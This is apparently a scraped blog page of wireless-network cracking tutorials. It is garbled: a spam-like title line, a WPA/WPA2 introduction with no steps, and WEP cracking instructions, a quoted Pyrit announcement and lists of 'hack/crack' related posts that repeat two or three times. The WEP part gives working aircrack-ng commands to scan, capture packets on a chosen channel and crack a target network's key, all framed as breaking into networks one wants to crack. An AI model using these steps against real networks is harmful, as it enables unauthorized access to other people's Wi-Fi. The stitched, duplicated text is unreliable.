.bootstrap - Safe with most medications

This short tutorial walks you through hacking and cracking WPA/WPA2 based networks which use pre-shared keys.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can by now only crack pre-shared keys. So ensure airodump-ng shows the network as having the authentication type of PSK.

If you know howto hack or crack a WEP based network, you might know that the WEP cracking and hacking methods are based on statistical methods. This WPA/WPA2 is unlike the WEP hacking / cracking approach based on plain brute force techniques. The brute force method is rather slow, since the pre-shared key can be from 8 to 63 characters in length, which might require too much time to crack.

UPDATE Oct 12 2008
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

Related posts:

1. Hack Wireless WEP Network
2. Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)
3. Howto Hack a Wireless WEP Network
4. Wireless: How To Secure Your Wireless Network
5. Crack Cisco VPN (hack)
6. Crack zip password with fcrackzip
7. Updated the entry on wireless network cracking
8. How to hack Windows password with Ophcrack
9. HackerGuide: Crack Password Encrypted Zip-files
10. Crack pdf password with pdfcrack

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng


Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1


Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1


Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap


The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

UPDATE Oct 12 2008
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

Related posts:

1. Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)
2. Hack Wireless WPA Network
3. Howto Hack a Wireless WEP Network
4. Wireless: How To Secure Your Wireless Network
5. Updated the entry on wireless network cracking
6. Crack Cisco VPN (hack)
7. WEP and WPA cracking and hacking tools for Windows Mobile
8. Crack / Hack a WIFI Using an IPhone / Ipod Touch
9. HackerGuide: Sniff Live Network Connections Using Ettercap
10. How to hack Windows password with Ophcrack

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

UPDATE Oct 12 2008
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

Related posts:

1. Hack Wireless WEP Network
2. Hack Wireless WPA Network
3. Howto Hack a Wireless WEP Network
4. Wireless: How To Secure Your Wireless Network
5. Updated the entry on wireless network cracking
6. Crack Cisco VPN (hack)
7. How to hack Windows password with Ophcrack
8. Crack / Hack a WIFI Using an IPhone / Ipod Touch
9. Crack or Recover Password Protected Excel Spreadsheet
10. Howto Wiretap – Sniff Network Traffic